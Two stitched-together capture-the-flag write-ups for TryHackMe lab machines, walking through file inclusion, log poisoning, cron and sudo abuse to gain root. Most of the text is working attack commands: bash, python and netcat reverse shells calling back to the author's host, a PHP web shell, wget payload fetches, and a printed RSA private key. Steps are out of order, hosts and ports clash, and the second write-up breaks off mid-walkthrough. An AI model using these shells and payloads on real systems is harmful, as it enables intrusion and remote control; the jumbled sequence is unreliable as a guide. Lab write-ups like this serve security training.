thm-watcher-public

Enumeration


Starting off with an nmap scan, I find that FTP, SSH and HTTP is open

root@kali:~/tryhackme/watcher# nmap -sC -sV 10.10.180.180
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-17 20:44 EST
Nmap scan report for 10.10.180.180
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e1:80:ec:1f:26:9e:32:eb:27:3f:26:ac:d2:37:ba:96 (RSA)
|   256 36:ff:70:11:05:8e:d4:50:7a:29:91:58:75:ac:2e:76 (ECDSA)
|_  256 48:d2:3e:45:da:0c:f0:f6:65:4e:f9:78:97:37:aa:8a (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Jekyll v4.1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corkplacemats
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Running gobuster to help find directories, I find post.php and robots.txt

root@kali:~/tryhackme/watcher# gobuster dir -u 10.10.180.180 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.180.180
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,php,txt
[+] Timeout:        10s
===============================================================
2021/02/17 20:45:30 Starting gobuster
===============================================================
/index.php (Status: 200)
/images (Status: 301)
/post.php (Status: 200)
/css (Status: 301)
/robots.txt (Status: 200)

Flag 1


Going to robots.txt, I find 2 allow files

robots

Looking navigating to 10.10.180.180/flag.txt I obtain the first flag

flag1

Flag 2


Trying to access the /secret_file_do_not_read.txt file I recieve a 403 error

403

Going back to my gobuster results, I found /posts.php Navigating there, the page loads but I do not recieve anything.

200

I could try fuzzing, but first I went back to the home page and looked at the source code. Here, I find that post.php takes an arugment of post

source

Testing this, I find it is vulnerable to local file inclusion by changing the url to post.php?post=../../../../../../etc/passwd

passwd

I want to read the /secret_file_do_not_read.txt that I did not have permission to do earlier. Trying to read the file using the LFI vulnerability works and I find FTP credentials

ftpcreds

Using these credentials, I can login to FTP and download the flag_2.txt file

root@kali:~/tryhackme/watcher# ftp 10.10.180.180

Connected to 10.10.180.180.
220 (vsFTPd 3.0.3)
Name (10.10.180.180:root): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> dir

200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Feb 17 23:31 files
-rw-r--r--    1 0        0              21 Dec 03 01:58 flag_2.txt
226 Directory send OK.

ftp> get flag_2.txt 

local: flag_2.txt remote: flag_2.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for flag_2.txt (21 bytes).
226 Transfer complete.
21 bytes received in 0.00 secs (15.2022 kB/s)

I can now read the second flag

flag2

Flag 3


Looking at the FTP server, I am allowed to upload items in the /files folder

ftp> dir -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
dr-xr-xr-x    3 65534    65534        4096 Dec 03 01:58 .
dr-xr-xr-x    3 65534    65534        4096 Dec 03 01:58 ..
drwxr-xr-x    2 1001     1001         4096 Feb 17 23:31 files
-rw-r--r--    1 0        0              21 Dec 03 01:58 flag_2.txt
226 Directory send OK.

I have the ability to upload files via FTP and can then access the files using the LFI vulnerability. I also know the files directory location is /home/ftpuser/ftp/files thanks to the note that gave me the FTP credentials. This will allow me to get a reverse shell. To start, I download a php reverse shell and edit the IP address. Then I upload it to the files directory of FTP

ftp> put php-reverse-shell.php 
local: php-reverse-shell.php remote: php-reverse-shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5491 bytes sent in 0.00 secs (137.8059 MB/s)

Now that I have uploaded the file, I start a netcat listener. Then, using the LFI vulnerability, I can access the php file so it executes

curl http://10.10.180.180/post.php?post=../../../../../../../srv/ftp/files/php-reverse-shell.php

Looking at my netcat listener, I see I receive a connect back.

root@kali:~/tryhackme/watcher# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.180.180] 56586
Linux watcher 4.15.0-128-generic #131-Ubuntu SMP Wed Dec 9 06:57:35 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 02:13:50 up  3:00,  2 users,  load average: 0.00, 0.00, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
will     pts/6    10.2.8.75        00:50   33:34   0.31s  0.31s -bash
root     pts/7    10.2.8.75        01:41   32:37   0.02s  0.02s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

I then import python3 into the shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@watcher:/$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/watcher# stty raw -echo
root@kali:~/tryhackme/watcher# fg

www-data@watcher:/$ 

I can now read the 3rd flag under /var/www/html/more_secrets_a9f10a

flag3

Flag 4


As www-data, I see I am allowed to run any command as the toby user

www-data@watcher:/$ sudo -l
Matching Defaults entries for www-data on watcher:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on watcher:
    (toby) NOPASSWD: ALL

I can easily login to the toby user without using a password by executing bash

www-data@watcher:/$ sudo -u toby /bin/bash
toby@watcher:/$ 

As toby, I can now read flag 4

flag4

Flag 5


Under toby’s home directory, I find a note stating cronjobs are running, likely under the jobs directory

toby@watcher:~$ ls
flag_4.txt  jobs  note.txt

toby@watcher:~$ cat note.txt  
Hi Toby,

I've got the cron jobs set up now so don't worry about getting that done.

This exploit is easy to find, but you could use pspy to monitor processes to find running cronjobs. Upload the pspy64 file then execute it

toby@watcher:~$ wget 10.2.8.75/pspy64
--2021-02-18 02:25:49--  http://10.2.8.75/pspy64
Connecting to 10.2.8.75:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: 'pspy64'

pspy64              100%[===================>]   2.94M   463KB/s    in 7.6s    

2021-02-18 02:25:57 (395 KB/s) - 'pspy64' saved [3078592/3078592]

toby@watcher:~$ chmod +x pspy64 
toby@watcher:~$ ./pspy64

Looking at results, I see that the cow.sh file under /home/toby/jobs is a cronjob run every minute

2021/02/18 02:27:01 CMD: UID=1002 PID=1832   | 
2021/02/18 02:27:01 CMD: UID=1002 PID=1831   | /bin/bash /home/toby/jobs/cow.sh 
2021/02/18 02:27:01 CMD: UID=1002 PID=1830   | /bin/sh -c /home/toby/jobs/cow.sh 

Looking at this file, I see my current user can edit it

toby@watcher:~/jobs$ ls -la cow.sh 
-rwxr-xr-x 1 toby toby 46 Dec  3 03:31 cow.sh

I put a bash reverse shell at the bottom of the script to call back to my local machine

toby@watcher:~/jobs$ echo "bash -i >& /dev/tcp/10.2.8.75/8080 0>&1" >> cow.sh

After, I set up my netcat listener and wait for less than a minute. I recieve a connect back as the mat user

root@kali:~/tryhackme/watcher# nc -lvnp 8080
listening on [any] 8080 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.180.180] 40798
bash: cannot set terminal process group (1887): Inappropriate ioctl for device
bash: no job control in this shell
mat@watcher:~$ 

I can now read the 5th flag

flag5

Flag 6


There is a note left on mat’s desktop from the will user. This note says I can run a python script as him using sudo

mat@watcher:~$ cat note.txt 
Hi Mat,

I've set up your sudo rights to use the python script as my user. You can only run the script with sudo so it should be safe.

Will

Running sudo -l I confirm this is true

mat@watcher:~$ sudo -l
Matching Defaults entries for mat on watcher:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mat may run the following commands on watcher:
    (will) NOPASSWD: /usr/bin/python3 /home/mat/scripts/will_script.py *

Reading the script we can run as will, I see it imports os sys and cmd

mat@watcher:~/scripts$ cat will_script.py 
import os
import sys
from cmd import get_command

cmd = get_command(sys.argv[1])

whitelist = ["ls -lah", "id", "cat /etc/passwd"]

if cmd not in whitelist:
        print("Invalid command!")
        exit()

os.system(cmd)

Looking at the file permissions, I see my current user owns cmd.py. This means I can insert a commands into cmd.py and when I run will_script.py they will execute

mat@watcher:~/scripts$ ls -la
total 16
drwxrwxr-x 2 will will 4096 Dec  3 03:31 .
drwxr-xr-x 6 mat  mat  4096 Dec  3 03:31 ..
-rw-r--r-- 1 mat  mat   133 Dec  3 03:31 cmd.py
-rw-r--r-- 1 will will  208 Dec  3 01:58 will_script.py

I grab a python reverse shell and insert it in  cmd.py

mat@watcher:~/scripts$ echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.9.2.255',9003));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);" > cmd.py

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“ATTACKER_IP”,5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);

And running will_script.py as will by typing the following will get us a shell.

mat@watcher:~/scripts$ sudo -u will python3 /home/mat/scripts/will_script.py cmd.py

Looking at my netcat listener, I received a connect back as will

root@kali:~/tryhackme/watcher# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.180.180] 38226
$ whoami
will

I import python3 into the shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
will@watcher:~/scripts$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/watcher# stty raw -echo
root@kali:~/tryhackme/watcher# nc -lvnp 1234

will@watcher:~/scripts$ 

Now, I can read the 6th flag

flag6

Flag 7


Looking into the will user, I find he is part of the adm group

will@watcher:/home/will$ id
uid=1000(will) gid=1000(will) groups=1000(will),4(adm)

Since this is an unusual group, I want to find if there are any files under this group. Here, I find a file named key.64

will@watcher:/home/will$ find / -group adm   
/opt/backups
/opt/backups/key.b64

Reading the file shows a large base64 value

will@watcher:/home/will$ cat /opt/backups/key.b64
LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBelBhUUZvbFFx
OGNIb205bXNzeVBaNTNhTHpCY1J5QncrcnlzSjNoMEpDeG5WK2FHCm9wWmRjUXowMVlPWWRqWUlh
WkVKbWRjUFZXUXAvTDB1YzV1M2lnb2lLMXVpWU1mdzg1ME43dDNPWC9lcmRLRjQKanFWdTNpWE45
ZG9CbXIzVHVVOVJKa1ZuRER1bzh5NER0SXVGQ2Y5MlpmRUFKR1VCMit2Rk9ON3E0S0pzSXhnQQpu
TThrajhOa0ZrRlBrMGQxSEtIMitwN1FQMkhHWnJmM0RORm1RN1R1amEzem5nYkVWTzdOWHgzVjNZ
T0Y5eTFYCmVGUHJ2dERRVjdCWWI2ZWdrbGFmczRtNFhlVU8vY3NNODRJNm5ZSFd6RUo1enBjU3Jw
bWtESHhDOHlIOW1JVnQKZFNlbGFiVzJmdUxBaTUxVVIvMndOcUwxM2h2R2dscGVQaEtRZ1FJREFR
QUJBb0lCQUhtZ1RyeXcyMmcwQVRuSQo5WjVnZVRDNW9VR2padjdtSjJVREZQMlBJd3hjTlM4YUl3
YlVSN3JRUDNGOFY3cStNWnZEYjNrVS80cGlsKy9jCnEzWDdENTBnaWtwRVpFVWVJTVBQalBjVU5H
VUthWG9hWDVuMlhhWUJ0UWlSUjZaMXd2QVNPMHVFbjdQSXEyY3oKQlF2Y1J5UTVyaDZzTnJOaUpR
cEdESkRFNTRoSWlnaWMvR3VjYnluZXpZeWE4cnJJc2RXTS8wU1VsOUprbkkwUQpUUU9pL1gyd2Z5
cnlKc20rdFljdlk0eWRoQ2hLKzBuVlRoZWNpVXJWL3drRnZPRGJHTVN1dWhjSFJLVEtjNkI2CjF3
c1VBODUrdnFORnJ4ekZZL3RXMTg4VzAwZ3k5dzUxYktTS0R4Ym90aTJnZGdtRm9scG5Gdyt0MFFS
QjVSQ0YKQWxRSjI4a0NnWUVBNmxyWTJ4eWVMaC9hT0J1OStTcDN1SmtuSWtPYnBJV0NkTGQxeFhO
dERNQXo0T3FickxCNQpmSi9pVWNZandPQkh0M05Oa3VVbTZxb0VmcDRHb3UxNHlHek9pUmtBZTRI
UUpGOXZ4RldKNW1YK0JIR0kvdmoyCk52MXNxN1BhSUtxNHBrUkJ6UjZNL09iRDd5UWU3OE5kbFF2
TG5RVGxXcDRuamhqUW9IT3NvdnNDZ1lFQTMrVEUKN1FSNzd5UThsMWlHQUZZUlhJekJncDVlSjJB
QXZWcFdKdUlOTEs1bG1RL0UxeDJLOThFNzNDcFFzUkRHMG4rMQp2cDQrWThKMElCL3RHbUNmN0lQ
TWVpWDgwWUpXN0x0b3pyNytzZmJBUVoxVGEybzFoQ2FsQVF5SWs5cCtFWHBJClViQlZueVVDMVhj
dlJmUXZGSnl6Z2Njd0V4RXI2Z2xKS09qNjRiTUNnWUVBbHhteC9qeEtaTFRXenh4YjlWNEQKU1Bz
K055SmVKTXFNSFZMNFZUR2gydm5GdVR1cTJjSUM0bTUzem4reEo3ZXpwYjFyQTg1SnREMmduajZu
U3I5UQpBL0hiakp1Wkt3aTh1ZWJxdWl6b3Q2dUZCenBvdVBTdVV6QThzOHhIVkk2ZWRWMUhDOGlw
NEptdE5QQVdIa0xaCmdMTFZPazBnejdkdkMzaEdjMTJCcnFjQ2dZQWhGamkzNGlMQ2kzTmMxbHN2
TDRqdlNXbkxlTVhuUWJ1NlArQmQKYktpUHd0SUcxWnE4UTRSbTZxcUM5Y25vOE5iQkF0aUQ2L1RD
WDFrejZpUHE4djZQUUViMmdpaWplWVNKQllVTwprSkVwRVpNRjMwOFZuNk42L1E4RFlhdkpWYyt0
bTRtV2NOMm1ZQnpVR1FIbWI1aUpqa0xFMmYvVHdZVGcyREIwCm1FR0RHd0tCZ1FDaCtVcG1UVFJ4
NEtLTnk2d0prd0d2MnVSZGo5cnRhMlg1cHpUcTJuRUFwa2UyVVlsUDVPTGgKLzZLSFRMUmhjcDlG
bUY5aUtXRHRFTVNROERDYW41Wk1KN09JWXAyUloxUnpDOUR1ZzNxa3R0a09LQWJjY0tuNQo0QVB4
STFEeFUrYTJ4WFhmMDJkc1FIMEg1QWhOQ2lUQkQ3STVZUnNNMWJPRXFqRmRaZ3Y2U0E9PQotLS0t
LUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=

Decrypting this base64 value shows an id_rsa.

will@watcher:/home/will$ cat /opt/backups/key.b64 | base64 -d
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAzPaQFolQq8cHom9mssyPZ53aLzBcRyBw+rysJ3h0JCxnV+aG
opZdcQz01YOYdjYIaZEJmdcPVWQp/L0uc5u3igoiK1uiYMfw850N7t3OX/erdKF4
jqVu3iXN9doBmr3TuU9RJkVnDDuo8y4DtIuFCf92ZfEAJGUB2+vFON7q4KJsIxgA
nM8kj8NkFkFPk0d1HKH2+p7QP2HGZrf3DNFmQ7Tuja3zngbEVO7NXx3V3YOF9y1X
eFPrvtDQV7BYb6egklafs4m4XeUO/csM84I6nYHWzEJ5zpcSrpmkDHxC8yH9mIVt
dSelabW2fuLAi51UR/2wNqL13hvGglpePhKQgQIDAQABAoIBAHmgTryw22g0ATnI
9Z5geTC5oUGjZv7mJ2UDFP2PIwxcNS8aIwbUR7rQP3F8V7q+MZvDb3kU/4pil+/c
q3X7D50gikpEZEUeIMPPjPcUNGUKaXoaX5n2XaYBtQiRR6Z1wvASO0uEn7PIq2cz
BQvcRyQ5rh6sNrNiJQpGDJDE54hIigic/GucbynezYya8rrIsdWM/0SUl9JknI0Q
TQOi/X2wfyryJsm+tYcvY4ydhChK+0nVTheciUrV/wkFvODbGMSuuhcHRKTKc6B6
1wsUA85+vqNFrxzFY/tW188W00gy9w51bKSKDxboti2gdgmFolpnFw+t0QRB5RCF
AlQJ28kCgYEA6lrY2xyeLh/aOBu9+Sp3uJknIkObpIWCdLd1xXNtDMAz4OqbrLB5
fJ/iUcYjwOBHt3NNkuUm6qoEfp4Gou14yGzOiRkAe4HQJF9vxFWJ5mX+BHGI/vj2
Nv1sq7PaIKq4pkRBzR6M/ObD7yQe78NdlQvLnQTlWp4njhjQoHOsovsCgYEA3+TE
7QR77yQ8l1iGAFYRXIzBgp5eJ2AAvVpWJuINLK5lmQ/E1x2K98E73CpQsRDG0n+1
vp4+Y8J0IB/tGmCf7IPMeiX80YJW7Ltozr7+sfbAQZ1Ta2o1hCalAQyIk9p+EXpI
UbBVnyUC1XcvRfQvFJyzgccwExEr6glJKOj64bMCgYEAlxmx/jxKZLTWzxxb9V4D
SPs+NyJeJMqMHVL4VTGh2vnFuTuq2cIC4m53zn+xJ7ezpb1rA85JtD2gnj6nSr9Q
A/HbjJuZKwi8uebquizot6uFBzpouPSuUzA8s8xHVI6edV1HC8ip4JmtNPAWHkLZ
gLLVOk0gz7dvC3hGc12BrqcCgYAhFji34iLCi3Nc1lsvL4jvSWnLeMXnQbu6P+Bd
bKiPwtIG1Zq8Q4Rm6qqC9cno8NbBAtiD6/TCX1kz6iPq8v6PQEb2giijeYSJBYUO
kJEpEZMF308Vn6N6/Q8DYavJVc+tm4mWcN2mYBzUGQHmb5iJjkLE2f/TwYTg2DB0
mEGDGwKBgQCh+UpmTTRx4KKNy6wJkwGv2uRdj9rta2X5pzTq2nEApke2UYlP5OLh
/6KHTLRhcp9FmF9iKWDtEMSQ8DCan5ZMJ7OIYp2RZ1RzC9Dug3qkttkOKAbccKn5
4APxI1DxU+a2xXXf02dsQH0H5AhNCiTBD7I5YRsM1bOEqjFdZgv6SA==
-----END RSA PRIVATE KEY-----

I copy this id_rsa to my local machine and change the file permissions so it is useable

root@kali:~/tryhackme/watcher# chmod 600 id_rsa

Testing this id_rsa on root, I find it is valid and allows me to login

root@kali:~/tryhackme/watcher# ssh -i id_rsa root@10.10.180.180
load pubkey "id_rsa": invalid format
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-128-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Feb 18 02:48:28 UTC 2021

  System load:  0.0                Processes:             122
  Usage of /:   22.3% of 18.57GB   Users logged in:       0
  Memory usage: 38%                IP address for eth0:   10.10.180.180
  Swap usage:   0%                 IP address for lxdbr0: 10.14.179.1


33 packages can be updated.
0 updates are security updates.


Last login: Thu Dec  3 03:25:38 2020
root@watcher:~# 

As root, I can now read the final flag

thm-archangel-public

Enumeration


 

root@kali:~/tryhackme/archangle# nmap -sC -sV 10.10.169.125

Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-04 14:01 EST
Nmap scan report for mafialive.thm (10.10.169.125)
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9f:1d:2c:9d:6c:a4:0e:46:40:50:6f:ed:cf:1c:f3:8c (RSA)
|   256 63:73:27:c7:61:04:25:6a:08:70:7a:36:b2:f2:84:0d (ECDSA)
|_  256 b6:4e:d2:9c:37:85:d6:76:53:e8:c4:e0:48:1c:ae:6c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/test.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Navigating to the website, I see a normal looking website, however I see another hostname of mafialive.thm under Send us Mail

website

I add this hostname to my /etc/hosts file and navigate to the new website and the first flag.

flag1

Running gobuster on mafialive.thm I find test.php

root@kali:~/tryhackme/archangle# gobuster dir -u http://mafialive.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://mafialive.thm/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2021/02/04 14:08:16 Starting gobuster
===============================================================
/test.php (Status: 200)

Navigating to test.php I find a button

test

Pressing the button I find the URL changes to test.php?view=/var/www/html/development_testing/mrrobot.php

test1

Exploit


LFI PHP Wrappers

The URL shown can be vulnerable to several things, such as SQL injection, directory traversal, RFI and LFI. Testing one by one I find most of them end with a Not Allowed response.

notallowed

Testing PHP Wrappers for LFI, I find that it is possible to convert the page to base64

http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php

base64

Trying to read /etc/passwd still fails, so I try to read the test.php file instead to see what filtering is happening

┌──(kali㉿kali)-[~/thm/archangel]
└─$ curl http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

<!DOCTYPE HTML>
<html>

<head>
<title>INCLUDE</title>
<h1>Test Page. Not to be Deployed</h1>

</button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>
CQo8IURPQ1RZUEUgSFRNTD4KPGh0bWw+Cgo8aGVhZD4KICAgIDx0aXRsZT5JTkNMVURFPC90aXRsZT4KICAgIDxoMT5UZXN0IFBhZ2UuIE5vdCB0byBiZSBEZXBsb3llZDwvaDE+CiAKICAgIDwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iL3Rlc3QucGhwP3ZpZXc9L3Zhci93d3cvaHRtbC9kZXZlbG9wbWVudF90ZXN0aW5nL21ycm9ib3QucGhwIj48YnV0dG9uIGlkPSJzZWNyZXQiPkhlcmUgaXMgYSBidXR0b248L2J1dHRvbj48L2E+PGJyPgogICAgICAgIDw/cGhwCgoJICAgIC8vRkxBRzogdGhte2V4cGxvMXQxbmdfbGYxfQoKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICBpZihpc3NldCgkX0dFVFsidmlldyJdKSl7CgkgICAgaWYoIWNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcuLi8uLicpICYmIGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcvdmFyL3d3dy9odG1sL2RldmVsb3BtZW50X3Rlc3RpbmcnKSkgewogICAgICAgICAgICAJaW5jbHVkZSAkX0dFVFsndmlldyddOwogICAgICAgICAgICB9ZWxzZXsKCgkJZWNobyAnU29ycnksIFRoYXRzIG5vdCBhbGxvd2VkJzsKICAgICAgICAgICAgfQoJfQogICAgICAgID8+CiAgICA8L2Rpdj4KPC9ib2R5PgoKPC9odG1sPgoKCg== </div>
</body>

</html>

This gives a long base64 value. I save it to my machine then decrypt it

root@kali:~/tryhackme/archangle# cat base | base64 -d

<!DOCTYPE HTML>
<html>

<head>
    <title>INCLUDE</title>
    <h1>Test Page. Not to be Deployed</h1>
 
    </button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>
        <?php

            //FLAG: thm{explo1t1ng_lf1}

            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
            if(isset($_GET["view"])){
            if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
                include $_GET['view'];
            }else{

                echo 'Sorry, Thats not allowed';
            }
        }
        ?>
    </div>
</body>

</html>

Log Poisoning

Looking at the base64 value decoded, I find that we are not allowed to use ../.. and we have to start our string with /var/www/html/development_testing. These are the only two conditions. A well known bypass for ../.. is to use a double backslash which we are allowed to do.

I test the double backslash to see if I can read /etc/passwd.

┌──(kali㉿kali)-[~/thm/archangel]
└─$ curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//..//etc/passwd | html2text
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1645 100 1645 0 0 24191 0 --:--:-- --:--:-- --:--:-- 24191

****** Test Page. Not to be Deployed ******
Here_is_a_button
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:
x:4:65534:sync:/bin:/bin/sync --snp--
nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin uuidd:x:105:109::/run/
uuidd:/usr/sbin/nologin sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
archangel:x:1001:1001:Archangel,,,:/home/archangel:/bin/bash

┌──(kali㉿kali)-[~/thm/archangel]

I can now use this to search the box. Looking for SSH keys do not work and I can’t read any useful files, so I try log poisoning. First, I need to find where the logs are stored. Testing the default places, I find /var/log/apache2/access.log contains all logs for the HTTP server.

view-source:http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log

log

Scrolling to the bottom of this log file, I see all of my requests through the LFI vulnerable.

log1

I know that my requests are logged to this file, which means I can insert PHP code and then execute it on /var/log/apache2/access.log To start, I use a simple PHP shell code and insert it at the user agent

User-Agent: <?php system($_GET['cmd']); ?>

Refreshing access.log, I see my php code is now in the log file

I can now test command execution

so i uploaded 1st puck.php

GIF8
<?php echo system($_REQUEST['puck']); ?>

2nd  i accessed

┌──(kali㉿kali)-[~/thm]
└─$ curl http://mafialive.thm/puck.php?puck=ls 127 ⨯
GIF8
index.html
mrrobot.php
puck.php
puck.php.1

3th i runned

┌──(kali㉿kali)-[~/thm]
└─$ curl http://mafialive.thm/puck.php?puck=wget+http%3a//10.9.2.255%3a8000/rev.php 
GIF8
┌──(kali㉿kali)-[~/thm/archangel]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.191.165 - - [22/Jul/2021 04:51:25] "GET /rev.php HTTP/1.1" 200 -

4th i runned and got the shell

┌──(kali㉿kali)-[~/thm]
└─$ curl http://mafialive.thm/rev.php
┌──(kali㉿kali)-[~/thm]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.9.2.255] from (UNKNOWN) [10.10.191.165] 39902
Linux ubuntu 4.15.0-123-generic #126-Ubuntu SMP Wed Oct 21 09:40:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
14:23:51 up 2:24, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

.

Since I can execute commands, I can upload files. Using a PHP Reverse Shell I can upload this file and then navigate to it. I setup up a python HTTP Server on my local machine then use wget to upload the file

I first import python3 into the shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/archangle# stty raw -echo
root@kali:~/tryhackme/archangle# fg

www-data@ubuntu:/$

I can now read the second flag

flag2

Exploiting archangel User


To start, I uploaded and ran linpeas.sh

www-data@ubuntu:/tmp$ wget 10.2.8.75/linpeas.sh

--2021-02-05 01:43:42--  http://10.2.8.75/linpeas.sh
Connecting to 10.2.8.75:80... connected.
HTTP request sent, awaiting response... 200 OK                                                                                                                                              
Length: 229696 (224K) [text/x-sh]                                                             
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 224.31K  61.4KB/s    in 3.7s

2021-02-05 01:43:47 (61.4 KB/s) - 'linpeas.sh' saved [229696/229696]
                                               
www-data@ubuntu:/tmp$ bash linpeas.sh 

Looking through the results, I find a cronjob for the archangel user

[+] Cron jobs 

.............................................

*/1 *   * * *   archangel /opt/helloworld.sh   	

Checking out this file, I see it runs a basic echo script.

www-data@ubuntu:/opt$ cat helloworld.sh 
#!/bin/bash
echo "hello world" >> /opt/backupfiles/helloworld.txt

Looking at the permissions, I find everyone has permission to write to this file

www-data@ubuntu:/opt$ ls -la helloworld.sh 
-rwxrwxrwx 1 archangel archangel 66 Nov 20 10:35 helloworld.sh

Since I can write to the file, I put in a reverse shell

www-data@ubuntu:/opt$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.8.75 1234 >/tmp/f" > helloworld.sh

After setting up a netcat listener and waiting for a few moments, I get a connect back as archangel

root@kali:~/tryhackme/archangle# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.166.10] 40080
/bin/sh: 0: can't access tty; job control turned off

$ whoami
archangel

Again, I import python3 into the shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
archangel@ubuntu:~$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/archangle# stty raw -echo
